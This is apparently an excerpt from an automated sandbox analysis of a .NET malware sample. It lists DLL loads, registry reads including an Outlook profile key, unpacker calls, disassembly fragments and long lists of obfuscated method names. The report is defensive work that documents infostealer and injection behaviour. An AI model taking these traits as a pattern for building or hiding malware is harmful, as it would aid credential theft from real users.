                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeSection loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeSection loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: MN1qo2qaJmEvXDP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: MN1qo2qaJmEvXDP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: systray.pdb source: RegSvcs.exe, 0000000A.00000002.2615972014.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000012.00000002.4779400011.000000000083E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 0000000A.00000002.2615972014.00000000011F7000.00000004.00000020.00020000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000012.00000002.4779400011.000000000083E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: aDvThgRLSEMTIq.exe, 00000012.00000002.4780554280.0000000000DFE000.00000002.00000001.01000000.0000000D.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4781364571.0000000000DFE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: RegSvcs.pdb, source: systray.exe, 00000013.00000002.4778260554.0000000002F42000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782860137.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.000000000299C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2913860975.000000002A8AC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000003.2615010228.000000000474C000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000003.2622158668.00000000048F7000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, systray.exe, systray.exe, 00000013.00000003.2615010228.000000000474C000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000003.2622158668.00000000048F7000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782095666.0000000004C3E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782095666.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: systray.exe, 00000013.00000002.4778260554.0000000002F42000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4782860137.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, aDvThgRLSEMTIq.exe, 00000014.00000002.4782686090.000000000299C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.2913860975.000000002A8AC000.00000004.80000000.00040000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.MN1qo2qaJmEvXDP.exe.27a9f8c.0.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, TtlArnWQhEOvx9I77P.cs.Net Code: nIUgB65bQXpUkNhlvYn System.Reflection.Assembly.Load(byte[])
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, TtlArnWQhEOvx9I77P.cs.Net Code: nIUgB65bQXpUkNhlvYn System.Reflection.Assembly.Load(byte[])
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, TtlArnWQhEOvx9I77P.cs.Net Code: nIUgB65bQXpUkNhlvYn System.Reflection.Assembly.Load(byte[])
                Source: 0.2.MN1qo2qaJmEvXDP.exe.7500000.7.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.MN1qo2qaJmEvXDP.exe.3e62378.6.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 11.2.rlJvZXSinaRi.exe.326a0f0.0.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_07C8D380 pushfd ; retf 0_2_07C8D381
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_0966C990 push 400905A8h; iretd 0_2_0966C995
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_096663F2 pushad ; retf 0_2_096663F9
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeCode function: 0_2_09666430 pushfd ; retf 0_2_09666431
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004071DE push 6FB25C47h; retf 10_2_004071E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004031B0 push eax; ret 10_2_004031B2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0040B9B7 push ebp; retf 10_2_0040B9BE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004172E9 push dword ptr [esi+eax*2+5Fh]; retf 10_2_004172F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_004133E3 push ss; retn A658h10_2_0041350B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00414BF2 push edi; ret 10_2_00414C12
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00414C28 push edi; ret 10_2_00414C12
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00418D95 pushfd ; retf 10_2_00418DAD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_00415661 push edx; iretd 10_2_00415662
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0166225F pushad ; ret 10_2_016627F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016627FA pushad ; ret 10_2_016627F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_016909AD push ecx; mov dword ptr [esp], ecx10_2_016909B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_0166283D push eax; iretd 10_2_01662858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 10_2_01661328 push eax; iretd 10_2_01661369
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_07FA6430 pushfd ; retf 11_2_07FA6431
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_07FA63F2 pushad ; retf 11_2_07FA63F9
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeCode function: 11_2_07FACAC0 push 400301A8h; iretd 11_2_07FACAC5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019BC54F push 8B019467h; ret 17_2_019BC554
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019BC54D pushfd ; ret 17_2_019BC54E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019709AD push ecx; mov dword ptr [esp], ecx17_2_019709B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019BC9D7 push edi; ret 17_2_019BC9D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01941368 push eax; iretd 17_2_01941369
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_01941FEC push eax; iretd 17_2_01941FED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 17_2_019C7E99 push ecx; ret 17_2_019C7EAC
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_04AD09AD push ecx; mov dword ptr [esp], ecx19_2_04AD09B6
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_00AB402B push 6FB25C47h; retf 19_2_00AB4035
                Source: C:\Windows\SysWOW64\systray.exeCode function: 19_2_00AC4136 push dword ptr [esi+eax*2+5Fh]; retf 19_2_00AC4145
                Source: MN1qo2qaJmEvXDP.exeStatic PE information: section name: .text entropy: 7.73824516544036
                Source: rlJvZXSinaRi.exe.0.drStatic PE information: section name: .text entropy: 7.73824516544036
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, uSCOeOswi3t3pCK74b0.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PwJeOODmhv', 'JWZekioUfb', 'PIceY14kDV', 'oQVect2SqJ', 'DOBePAt7gs', 'N3telub0je', 'yVBeEJf1pl'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, GEBJEhGjieg361Vr8V.csHigh entropy of concatenated method names: 'yQwucEQtTq', 'KIeuPFAYJQ', 'lgWulIqGL4', 'vbauE7RcaL', 'PePumUHWfR', 'LR6uBHaygB', 'FotuLogk2f', 'N1ZuoLgagq', 'BvVuCTq2Lc', 'oYbuAIKSNj'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, o9ymQMYacMp0ssZHyR.csHigh entropy of concatenated method names: 'UvWQGWF8sU', 'djAQj2TMbB', 'hO3Q8IwsUO', 'oABQSFfn2J', 'pZ9QHkTGmp', 'S5dQFvFBFA', 'egTQtuNHLK', 'c8sQZQUZSe', 'KvxQaboOyG', 'm2xQO1DIDB'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, cnly1l8b5RYA8Cg4hc.csHigh entropy of concatenated method names: 'zd59UbtUU8', 'HHa9u1a6Jj', 'WJn90cOvLY', 'xC19Deq2Rm', 'Tyy9WwYbrj', 'HKc0m4Q7xv', 'ApT0BatwLb', 'LJF0LfgrNP', 'Nmj0oNceFx', 'gBs0CDATRK'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, W2GbS7ctm56xnVCTTs.csHigh entropy of concatenated method names: 'GAInaIearf', 'GvCnkn37Qo', 'QEjncepLih', 'VRJnP98MoY', 'TdMnStVarj', 'VbLnh0q952', 'gAInHt86pm', 'BntnFCoXsT', 'y9vnMWHyiS', 'bd5nth7yr7'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, WZ8woTCqqfGmwsK6uH.csHigh entropy of concatenated method names: 'P47X8U4RDp', 'CKaXS7Kr8v', 'aiPXhGaDCh', 'uOQXHIr6k5', 'yrPXFn2YQn', 'DouXMe5I5Y', 'KufXtfpK56', 'EeoXZFHL7t', 'zMmX3hfPqk', 'v97Xa4AjQi'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, tHnWHHNaWw3UFRXi5I.csHigh entropy of concatenated method names: 'LoSsDEBJEh', 'EiesWg361V', 'LGysRP8OKi', 'hupsvoYtNe', 'GIssns9gnl', 'q1lsxb5RYA', 'ju7cq9B0fKAPyxioQe', 'yJy7iJjKjdkNWrFh3j', 'FKFssl11lF', 'gXrsKb3XsY'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, v9UB23bcfulLsphOi7.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oEKgC4edmU', 'MLrgAKGZAR', 'qNYgzlDA8Q', 'gZPKwJ2wJN', 'LmGKskTE69', 'F4LKgnMG95', 'qAeKK118Ha', 'UY4fhT5NEUWAOcnf9g0'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, GDVAAOBvhEAucrmXbL.csHigh entropy of concatenated method names: 'ecW1oLHqki', 'TUB1AQiWXT', 'u1vywS5lC8', 'ql1ysgubwl', 'kmx1OYKQrV', 'VYD1ktIlBk', 'JnP1YnK4qF', 'Xpx1cY18qK', 'oNR1Paem4F', 'Bbn1lvgnJd'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, TtlArnWQhEOvx9I77P.csHigh entropy of concatenated method names: 's8eKUf0xQM', 'AY6KfgrT4Y', 'J21Ku5rfAh', 'hQsKbTLHy6', 'lFIK0B9amg', 'qUKK9yXHow', 'k94KDDotJm', 'bXcKWskDxE', 'dZkKIvBcGF', 'bewKRxyoZv'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, z95CQt3ZHDEQED6kMV.csHigh entropy of concatenated method names: 'IRED2PrN54', 'NFqDr7fJ3K', 'kdMD5kCOxr', 'gpMDTkNosC', 'SZ4Dd9MICs', 'T3QD6FwFZj', 'P6PDi25GYV', 'z45DGoOgf2', 'LlDDjrMjKr', 'OJsDJ5tmWm'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, cS5igaL7Ukukna13hg.csHigh entropy of concatenated method names: 'MKUXnZdIQ0', 'HdMX1H8AYh', 'JIcXXdGFLh', 'eJVXptXXPD', 'Vn1X4Y6EZA', 'nAlX7SmjHr', 'Dispose', 'rm9yfL74V3', 'a8ZyuHjIdV', 'X2OybSyxD2'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, oioII1u2iohGVScvCK.csHigh entropy of concatenated method names: 'Dispose', 'PuksCna13h', 'H7egS9T0ic', 'oHCc9frGjM', 'cmWsAembM5', 'i08szgZ6PW', 'ProcessDialogKey', 'mdogwZ8woT', 'wqfgsGmwsK', 'CuHggAIDK8'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, pNHtmZjGyP8OKibupo.csHigh entropy of concatenated method names: 'FwlbTwLV9t', 'xYLb6Tj2db', 'XmobGjbNYL', 'Ek8bjNqewb', 'ODLbnbuM6H', 'uZrbxEdlIp', 'rfvb1Uy1w1', 'XmMbyeeGHZ', 'Nv3bXVVbvE', 'vI8bebD9eO'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, QtNeh2JvwRXJNSIss9.csHigh entropy of concatenated method names: 'G2O0dYdON9', 'jMN0ipQNkb', 'zSIbhCT88B', 'L0BbHbpoPO', 'sltbFBFbd8', 'pMybMu54pS', 'EqIbtCT76E', 'i3LbZTwfi0', 'thWb39l0hA', 'bSkbaHaYUb'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, IvSoATzCiQOIdwUjvL.csHigh entropy of concatenated method names: 'pEXe6nL7TL', 'zEreGDwlTV', 'Sx5ejoghsB', 'hPae8QFrr5', 'ntMeSriIID', 'owKeHB5pyu', 'YnPeFof8sC', 'CRJe7aLqHb', 'pX4e2dDFFU', 'XbOerOHf2b'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, EkCE1YgLaLwc7KBIkN.csHigh entropy of concatenated method names: 'HOj57TWyV', 'aBLTVY1gK', 'OTd6mbc9D', 'xdAiYtug9', 'BrKjQMUYi', 'dPyJPgjlf', 'tAlhQfMRoq0DNutkFA', 'ldK4avLUBusYBWotFt', 'm5jyVOYL7', 'rWKer1BWL'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, nCI8PvtrJldSaZ0bMU.csHigh entropy of concatenated method names: 'LA8Dfri7H5', 'V7FDbTof2X', 'NhhD9p0DnH', 'r2F9AsRjNl', 'Mcc9zTBqdp', 'GlbDwGZpfX', 'DSjDsw5mFl', 'POdDgRT1F9', 'LySDKTnRg8', 'gEsDN8CycI'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, dALCuLlFL8uRisXkOc.csHigh entropy of concatenated method names: 'ToString', 'Il5xOnajhI', 'bJExSFgj9P', 'yeMxhFnnyC', 'UinxHXrrHp', 'Y2nxFQRLVx', 'e25xM1BTA8', 'ljFxtSDyAV', 'R9ixZjsWHc', 'qXvx3lrsJd'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, YIDK8RAQK6sX8UPwYc.csHigh entropy of concatenated method names: 'HYXebgyMAo', 'o5Ve0bJvar', 'dKSe9B4Dpq', 'DjteDj92K3', 'bFceXSWuaj', 'lbBeWPCa8i', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, vTnFiassMKl25nAas6w.csHigh entropy of concatenated method names: 'XhkeAQqVGe', 'Q6deza8v8B', 'CtFpwDw5bi', 'vxFpsOpwam', 'RhTpgq6l94', 'AKkpK1noD4', 'ruXpNmxuns', 'WHbpUJKOY6', 'dnlpfoddJ5', 'qdvpu8hvCh'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.414ab48.2.raw.unpack, fovaF3EuYxn1vCZo2Q.csHigh entropy of concatenated method names: 'HrA1RJ0oib', 'NVy1vP4EOa', 'ToString', 'Rhx1fgRuf6', 'csO1uxUdo3', 'hjh1bACsK3', 'tTM10xnsVN', 'vN119UL8hY', 'qCR1DV8OAF', 'TgS1WEwOPt'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, uSCOeOswi3t3pCK74b0.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PwJeOODmhv', 'JWZekioUfb', 'PIceY14kDV', 'oQVect2SqJ', 'DOBePAt7gs', 'N3telub0je', 'yVBeEJf1pl'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, GEBJEhGjieg361Vr8V.csHigh entropy of concatenated method names: 'yQwucEQtTq', 'KIeuPFAYJQ', 'lgWulIqGL4', 'vbauE7RcaL', 'PePumUHWfR', 'LR6uBHaygB', 'FotuLogk2f', 'N1ZuoLgagq', 'BvVuCTq2Lc', 'oYbuAIKSNj'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, o9ymQMYacMp0ssZHyR.csHigh entropy of concatenated method names: 'UvWQGWF8sU', 'djAQj2TMbB', 'hO3Q8IwsUO', 'oABQSFfn2J', 'pZ9QHkTGmp', 'S5dQFvFBFA', 'egTQtuNHLK', 'c8sQZQUZSe', 'KvxQaboOyG', 'm2xQO1DIDB'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, cnly1l8b5RYA8Cg4hc.csHigh entropy of concatenated method names: 'zd59UbtUU8', 'HHa9u1a6Jj', 'WJn90cOvLY', 'xC19Deq2Rm', 'Tyy9WwYbrj', 'HKc0m4Q7xv', 'ApT0BatwLb', 'LJF0LfgrNP', 'Nmj0oNceFx', 'gBs0CDATRK'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, W2GbS7ctm56xnVCTTs.csHigh entropy of concatenated method names: 'GAInaIearf', 'GvCnkn37Qo', 'QEjncepLih', 'VRJnP98MoY', 'TdMnStVarj', 'VbLnh0q952', 'gAInHt86pm', 'BntnFCoXsT', 'y9vnMWHyiS', 'bd5nth7yr7'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, WZ8woTCqqfGmwsK6uH.csHigh entropy of concatenated method names: 'P47X8U4RDp', 'CKaXS7Kr8v', 'aiPXhGaDCh', 'uOQXHIr6k5', 'yrPXFn2YQn', 'DouXMe5I5Y', 'KufXtfpK56', 'EeoXZFHL7t', 'zMmX3hfPqk', 'v97Xa4AjQi'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, tHnWHHNaWw3UFRXi5I.csHigh entropy of concatenated method names: 'LoSsDEBJEh', 'EiesWg361V', 'LGysRP8OKi', 'hupsvoYtNe', 'GIssns9gnl', 'q1lsxb5RYA', 'ju7cq9B0fKAPyxioQe', 'yJy7iJjKjdkNWrFh3j', 'FKFssl11lF', 'gXrsKb3XsY'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, v9UB23bcfulLsphOi7.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'oEKgC4edmU', 'MLrgAKGZAR', 'qNYgzlDA8Q', 'gZPKwJ2wJN', 'LmGKskTE69', 'F4LKgnMG95', 'qAeKK118Ha', 'UY4fhT5NEUWAOcnf9g0'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, GDVAAOBvhEAucrmXbL.csHigh entropy of concatenated method names: 'ecW1oLHqki', 'TUB1AQiWXT', 'u1vywS5lC8', 'ql1ysgubwl', 'kmx1OYKQrV', 'VYD1ktIlBk', 'JnP1YnK4qF', 'Xpx1cY18qK', 'oNR1Paem4F', 'Bbn1lvgnJd'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, TtlArnWQhEOvx9I77P.csHigh entropy of concatenated method names: 's8eKUf0xQM', 'AY6KfgrT4Y', 'J21Ku5rfAh', 'hQsKbTLHy6', 'lFIK0B9amg', 'qUKK9yXHow', 'k94KDDotJm', 'bXcKWskDxE', 'dZkKIvBcGF', 'bewKRxyoZv'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, z95CQt3ZHDEQED6kMV.csHigh entropy of concatenated method names: 'IRED2PrN54', 'NFqDr7fJ3K', 'kdMD5kCOxr', 'gpMDTkNosC', 'SZ4Dd9MICs', 'T3QD6FwFZj', 'P6PDi25GYV', 'z45DGoOgf2', 'LlDDjrMjKr', 'OJsDJ5tmWm'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, cS5igaL7Ukukna13hg.csHigh entropy of concatenated method names: 'MKUXnZdIQ0', 'HdMX1H8AYh', 'JIcXXdGFLh', 'eJVXptXXPD', 'Vn1X4Y6EZA', 'nAlX7SmjHr', 'Dispose', 'rm9yfL74V3', 'a8ZyuHjIdV', 'X2OybSyxD2'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, oioII1u2iohGVScvCK.csHigh entropy of concatenated method names: 'Dispose', 'PuksCna13h', 'H7egS9T0ic', 'oHCc9frGjM', 'cmWsAembM5', 'i08szgZ6PW', 'ProcessDialogKey', 'mdogwZ8woT', 'wqfgsGmwsK', 'CuHggAIDK8'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, pNHtmZjGyP8OKibupo.csHigh entropy of concatenated method names: 'FwlbTwLV9t', 'xYLb6Tj2db', 'XmobGjbNYL', 'Ek8bjNqewb', 'ODLbnbuM6H', 'uZrbxEdlIp', 'rfvb1Uy1w1', 'XmMbyeeGHZ', 'Nv3bXVVbvE', 'vI8bebD9eO'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, QtNeh2JvwRXJNSIss9.csHigh entropy of concatenated method names: 'G2O0dYdON9', 'jMN0ipQNkb', 'zSIbhCT88B', 'L0BbHbpoPO', 'sltbFBFbd8', 'pMybMu54pS', 'EqIbtCT76E', 'i3LbZTwfi0', 'thWb39l0hA', 'bSkbaHaYUb'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, IvSoATzCiQOIdwUjvL.csHigh entropy of concatenated method names: 'pEXe6nL7TL', 'zEreGDwlTV', 'Sx5ejoghsB', 'hPae8QFrr5', 'ntMeSriIID', 'owKeHB5pyu', 'YnPeFof8sC', 'CRJe7aLqHb', 'pX4e2dDFFU', 'XbOerOHf2b'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, EkCE1YgLaLwc7KBIkN.csHigh entropy of concatenated method names: 'HOj57TWyV', 'aBLTVY1gK', 'OTd6mbc9D', 'xdAiYtug9', 'BrKjQMUYi', 'dPyJPgjlf', 'tAlhQfMRoq0DNutkFA', 'ldK4avLUBusYBWotFt', 'm5jyVOYL7', 'rWKer1BWL'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, nCI8PvtrJldSaZ0bMU.csHigh entropy of concatenated method names: 'LA8Dfri7H5', 'V7FDbTof2X', 'NhhD9p0DnH', 'r2F9AsRjNl', 'Mcc9zTBqdp', 'GlbDwGZpfX', 'DSjDsw5mFl', 'POdDgRT1F9', 'LySDKTnRg8', 'gEsDN8CycI'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, dALCuLlFL8uRisXkOc.csHigh entropy of concatenated method names: 'ToString', 'Il5xOnajhI', 'bJExSFgj9P', 'yeMxhFnnyC', 'UinxHXrrHp', 'Y2nxFQRLVx', 'e25xM1BTA8', 'ljFxtSDyAV', 'R9ixZjsWHc', 'qXvx3lrsJd'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, YIDK8RAQK6sX8UPwYc.csHigh entropy of concatenated method names: 'HYXebgyMAo', 'o5Ve0bJvar', 'dKSe9B4Dpq', 'DjteDj92K3', 'bFceXSWuaj', 'lbBeWPCa8i', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, vTnFiassMKl25nAas6w.csHigh entropy of concatenated method names: 'XhkeAQqVGe', 'Q6deza8v8B', 'CtFpwDw5bi', 'vxFpsOpwam', 'RhTpgq6l94', 'AKkpK1noD4', 'ruXpNmxuns', 'WHbpUJKOY6', 'dnlpfoddJ5', 'qdvpu8hvCh'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.40c0328.4.raw.unpack, fovaF3EuYxn1vCZo2Q.csHigh entropy of concatenated method names: 'HrA1RJ0oib', 'NVy1vP4EOa', 'ToString', 'Rhx1fgRuf6', 'csO1uxUdo3', 'hjh1bACsK3', 'tTM10xnsVN', 'vN119UL8hY', 'qCR1DV8OAF', 'TgS1WEwOPt'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, uSCOeOswi3t3pCK74b0.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PwJeOODmhv', 'JWZekioUfb', 'PIceY14kDV', 'oQVect2SqJ', 'DOBePAt7gs', 'N3telub0je', 'yVBeEJf1pl'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, GEBJEhGjieg361Vr8V.csHigh entropy of concatenated method names: 'yQwucEQtTq', 'KIeuPFAYJQ', 'lgWulIqGL4', 'vbauE7RcaL', 'PePumUHWfR', 'LR6uBHaygB', 'FotuLogk2f', 'N1ZuoLgagq', 'BvVuCTq2Lc', 'oYbuAIKSNj'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, o9ymQMYacMp0ssZHyR.csHigh entropy of concatenated method names: 'UvWQGWF8sU', 'djAQj2TMbB', 'hO3Q8IwsUO', 'oABQSFfn2J', 'pZ9QHkTGmp', 'S5dQFvFBFA', 'egTQtuNHLK', 'c8sQZQUZSe', 'KvxQaboOyG', 'm2xQO1DIDB'
                Source: 0.2.MN1qo2qaJmEvXDP.exe.8fb0000.8.raw.unpack, cnly1l8b5RYA8Cg4hc.csHigh entropy of concatenated method names: 'zd59UbtUU8', 'HHa9u1a6Jj', 'WJn90cOvLY', 'xC19Deq2Rm', 'Tyy9WwYbrj', 'HKc0m4Q7xv', 'ApT0BatwLb', 'LJF0LfgrNP', 'Nmj0oNceFx', 'gBs0CDATRK'
